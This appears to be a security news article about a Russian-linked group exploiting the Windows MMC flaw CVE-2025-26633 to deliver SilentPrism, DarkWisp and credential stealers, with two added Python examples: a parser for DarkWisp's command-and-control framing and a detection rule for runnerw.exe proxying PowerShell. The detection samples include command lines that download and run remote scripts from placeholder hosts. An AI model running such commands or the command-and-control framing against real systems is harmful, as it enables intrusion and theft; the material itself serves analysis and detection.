Russian Hackers Exploit CVE-2025-26633 via MSC EvilTwin to Deploy SilentPrism and DarkWisp

News Room
Published 31 March 2025 (last updated 2025/03/31 at 1:42 PM)

The threat actors behind the zero-day exploitation of a recently patched security vulnerability in Microsoft Windows have been found to deliver two new backdoors called SilentPrism and DarkWisp.

The activity has been attributed to a suspected Russian hacking group called Water Gamayun, which is also known as EncryptHub and LARVA-208.

“The threat actor deploys payloads primarily by means of malicious provisioning packages, signed .msi files, and Windows MSC files, using techniques like the IntelliJ runnerw.exe for command execution,” Trend Micro researchers Aliakbar Zahravi and Ahmed Mohamed Ibrahim said in a follow-up analysis published last week.

Water Gamayun has been linked to the active exploitation of CVE-2025-26633 (aka MSC EvilTwin), a vulnerability in the Microsoft Management Console (MMC) framework, to execute malware by means of a rogue Microsoft Console (.msc) file.

The attack chains involve the use of provisioning packages (.ppkg), signed Microsoft Windows Installer files (.msi), and .msc files to deliver information stealers and backdoors that are capable of persistence and data theft.

EncryptHub gained attention towards the end of June 2024, after having used a GitHub repository named “encrypthub” to push various kinds of malware families, including stealers, miners, and ransomware, via a fake WinRAR website. The threat actors have since moved to infrastructure of their own for both staging and command-and-control (C&C).

The .msi installers used in the attacks masquerade as legitimate messaging and meeting software such as DingTalk, QQTalk, and VooV Meeting. They are designed to execute a PowerShell downloader, which is then used to fetch and run the next-stage payload on a compromised host.

SilentPrism and DarkWisp

One such malware is a PowerShell implant dubbed SilentPrism that can set up persistence, execute multiple shell commands simultaneously, and maintain remote control, while also incorporating anti-analysis techniques to evade detection. Another PowerShell backdoor of note is DarkWisp, which enables system reconnaissance, exfiltration of sensitive data, and persistence.

“Once the malware exfiltrates reconnaissance and system information to the C&C server, it enters a continuous loop waiting for commands,” the researchers said. “The malware accepts commands through a TCP connection on port 8080, where commands arrive in the format COMMAND|<base64_encoded_command>.”

“The main communication loop ensures continuous interaction with the server, handling commands, maintaining connectivity, and securely transmitting results.”
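The framing the researchers describe, COMMAND|<base64_encoded_command> over TCP port 8080, is simple enough to parse from a captured stream, which is useful when triaging a pcap or a memory dump of the implant. The following is an added example written for this page, not code from Trend Micro or from the malware: it builds frames in that format (the operator side) and strictly parses them back (what the implant, or an analyst, does). The article does not say how consecutive frames are delimited or what text encoding the decoded command uses, so the newline delimiter and UTF-8 decoding are assumptions, and the sample stream is constructed, not real traffic.

```python
import base64
import binascii
from dataclasses import dataclass
from typing import List, Optional

# Framing reported by Trend Micro for DarkWisp: COMMAND|<base64_encoded_command>
# received over a TCP connection on port 8080.
PREFIX = b"COMMAND|"
C2_PORT = 8080


@dataclass
class Frame:
    raw: bytes
    command: Optional[str]   # decoded command text, or None if the frame was rejected
    error: Optional[str]     # reason the frame was rejected, or None if it parsed


def encode_command(command: str) -> bytes:
    """Operator side: wrap a plaintext command in the reported framing."""
    return PREFIX + base64.b64encode(command.encode("utf-8"))


def parse_frame(raw: bytes) -> Frame:
    """Implant/analyst side: check the prefix, then strictly decode the Base64 payload."""
    if not raw.startswith(PREFIX):
        return Frame(raw, None, "missing COMMAND| prefix")
    payload = raw[len(PREFIX):]
    try:
        # validate=True rejects characters outside the Base64 alphabet instead of
        # silently discarding them, so a corrupted or non-conforming frame is not
        # mistaken for a valid command.
        decoded = base64.b64decode(payload, validate=True)
    except (binascii.Error, ValueError) as exc:
        return Frame(raw, None, f"invalid base64 payload: {exc}")
    try:
        # Assumption: commands are UTF-8 text (the analysis does not state the encoding).
        return Frame(raw, decoded.decode("utf-8"), None)
    except UnicodeDecodeError:
        return Frame(raw, None, "decoded payload is not UTF-8 text")


def parse_stream(stream: bytes, delimiter: bytes = b"\n") -> List[Frame]:
    """Split a captured TCP stream into frames.

    Assumption (not stated in the analysis): consecutive frames are separated by a
    newline. Change `delimiter` if the captured traffic shows otherwise.
    """
    return [parse_frame(chunk.strip()) for chunk in stream.split(delimiter) if chunk.strip()]


def decoded_commands(stream: bytes) -> List[str]:
    """Only the commands that parsed, in order, for triage or IOC extraction."""
    return [f.command for f in parse_stream(stream) if f.command is not None]


# Constructed sample stream (not real captured traffic): two well-formed frames,
# one frame with a corrupted payload, and one line that is not a command frame.
SAMPLE_STREAM = (
    encode_command("whoami") + b"\n"
    + encode_command("Get-ChildItem $env:USERPROFILE\\Desktop") + b"\n"
    + b"COMMAND|not*valid*b64\n"
    + b"HEARTBEAT\n"
)

if __name__ == "__main__":
    for frame in parse_stream(SAMPLE_STREAM):
        if frame.error is None:
            print("COMMAND:", frame.command)
        else:
            print(f"REJECTED ({frame.error}):", frame.raw)
```

Strict decoding matters here: a lenient Base64 decoder would turn the corrupted third frame into garbage bytes and an analyst might log it as a real operator command. In a network detection, the literal prefix `COMMAND|` followed by Base64 alphabet characters on an outbound port 8080 connection is the observable this format gives you.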

The third payload dropped in the attacks is the MSC EvilTwin loader that weaponizes CVE-2025-26633 to execute a malicious .msc file, ultimately leading to the deployment of the Rhadamanthys Stealer. The loader is also designed to perform a cleanup of the system to avoid leaving a forensic trail.

Rhadamanthys is far from the only stealer in Water Gamayun’s arsenal: the group has also been observed delivering another commodity stealer called StealC, as well as three custom PowerShell variants referred to as EncryptHub Stealer variant A, variant B, and variant C.

The bespoke stealer is fully featured malware that can collect extensive system information, including details about antivirus software, installed software, network adapters, and running applications. It also extracts Wi-Fi passwords, Windows product keys, clipboard history, browser credentials, and session data from various apps related to messaging, VPN, FTP, and password management.

Furthermore, it specifically singles out files matching certain keywords and extensions, indicating a focus on gathering recovery phrases associated with cryptocurrency wallets.

“These variants exhibit similar functionalities and capabilities, with only minor modifications distinguishing them,” the researchers noted. “All EncryptHub variants covered in this research are modified versions of the open-source Kematian Stealer.”

One iteration of EncryptHub Stealer is noteworthy for the use of a new living-off-the-land binary (LOLBin) technique in which the IntelliJ process launcher “runnerw.exe” is used to proxy the execution of a remote PowerShell script on an infected system.
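The runnerw.exe technique is a process-tree problem for defenders: a signed JetBrains helper becomes the parent of PowerShell, so rules keyed only on the PowerShell command line miss the unusual ancestry, while rules that flag every runnerw.exe launch fire on developers running code from the IDE. The following is an added detection example written for this page, not Trend Micro's rule or the article's code. It evaluates process-creation events using Sysmon Event ID 1 field names (Image, ParentImage, CommandLine) and flags two patterns: runnerw.exe as the parent of PowerShell, and runnerw.exe itself being launched with a PowerShell command that fetches remote content. The sample events, file paths, `.invalid` hostnames and the exact form of the runnerw.exe command line are all constructed; the article only states that runnerw.exe was used to proxy execution of a remote PowerShell script, and the remote-fetch token list is a heuristic chosen here.

```python
import re
from pathlib import PureWindowsPath
from typing import Dict, List, Tuple

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Tokens indicating PowerShell is fetching and/or executing remote content.
# Heuristic list chosen for this example; extend it from your own telemetry.
REMOTE_FETCH = re.compile(
    r"(https?://|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|"
    r"downloadstring|downloadfile|invoke-expression|\biex\b|net\.webclient)",
    re.IGNORECASE,
)


def image_name(path: str) -> str:
    """Case-insensitive basename of a Windows image path."""
    return PureWindowsPath(path).name.lower()


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the reasons one process-creation event is suspicious (empty list if none).

    Field names follow Sysmon Event ID 1: Image, ParentImage, CommandLine.
    """
    reasons: List[str] = []
    image = image_name(event.get("Image", ""))
    parent = image_name(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")

    # Pattern A: runnerw.exe is the parent of a PowerShell process. Benign IDE use
    # normally launches the developer's program (java.exe, python.exe, ...), not PowerShell.
    if parent == "runnerw.exe" and image in POWERSHELL_IMAGES:
        reasons.append("runnerw.exe spawned PowerShell")
        if REMOTE_FETCH.search(cmdline):
            reasons.append("PowerShell command line fetches/executes remote content")

    # Pattern B: the runnerw.exe launch itself carries a remote-fetch PowerShell command,
    # which is visible before the child process appears. Command-line shape is assumed.
    if image == "runnerw.exe" and "powershell" in cmdline.lower() and REMOTE_FETCH.search(cmdline):
        reasons.append("runnerw.exe invoked to proxy a remote PowerShell script")

    return reasons


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Run evaluate() over a batch and keep only the events that fired."""
    return [(i, r) for i, r in ((i, evaluate(e)) for i, e in enumerate(events)) if r]


# Constructed sample events (not real telemetry); paths and hostnames are placeholders.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # suspicious: runnerw.exe outside an IDE install proxies PowerShell that downloads and runs a script
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Users\Public\runnerw.exe",
        "CommandLine": 'powershell -nop -w hidden -c "iex (iwr http://c2.example.invalid/s.ps1)"',
    },
    {   # benign: IntelliJ running a Java program through its normal launcher
        "Image": r"C:\Program Files\Java\jdk-17\bin\java.exe",
        "ParentImage": r"C:\Program Files\JetBrains\IntelliJ IDEA\bin\runnerw.exe",
        "CommandLine": r"java -cp C:\dev\app\out Main",
    },
    {   # out of scope for this rule: remote fetch, but not via runnerw.exe
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'powershell -c "iwr http://intranet.example.invalid/tool.ps1 -OutFile t.ps1"',
    },
    {   # suspicious: the runnerw.exe launch itself carries the remote PowerShell command
        "Image": r"C:\Users\Public\runnerw.exe",
        "ParentImage": r"C:\Users\Public\installer.exe",
        "CommandLine": 'runnerw.exe powershell -c "IEX(New-Object Net.WebClient).DownloadString(\'http://c2.example.invalid/a.ps1\')"',
    },
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(idx, "->", "; ".join(reasons))
```

The second sample event is the tuning case: a developer running a program from IntelliJ produces a runnerw.exe parent, so the rule keys on the child being PowerShell rather than on runnerw.exe alone. Where you have the data, adding the image path (a copy of runnerw.exe outside a JetBrains install directory) and the grandparent process as extra conditions will further cut false positives; that refinement is not shown here because the article does not say where the binary was placed.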

The stealer artifacts, distributed through malicious MSI packages or binary malware droppers, have also been found to propagate other malware families like Lumma Stealer, Amadey, and clippers.

Further analysis of the threat actor’s C&C infrastructure (“82.115.223[.]182”) has revealed the use of other PowerShell scripts to download and execute AnyDesk software for remote access and the ability of the operators to send Base64-encoded remote commands to the victim machine.

“Water Gamayun’s use of various delivery methods and techniques in its campaign, such as provisioning malicious payloads through signed Microsoft Installer files and leveraging LOLBins, highlights their adaptability in compromising victims’ systems and data,” Trend Micro said.

“Their intricately designed payloads and C&C infrastructure enable the threat actor to maintain persistence, dynamically control infected systems, and obfuscate their activities.”
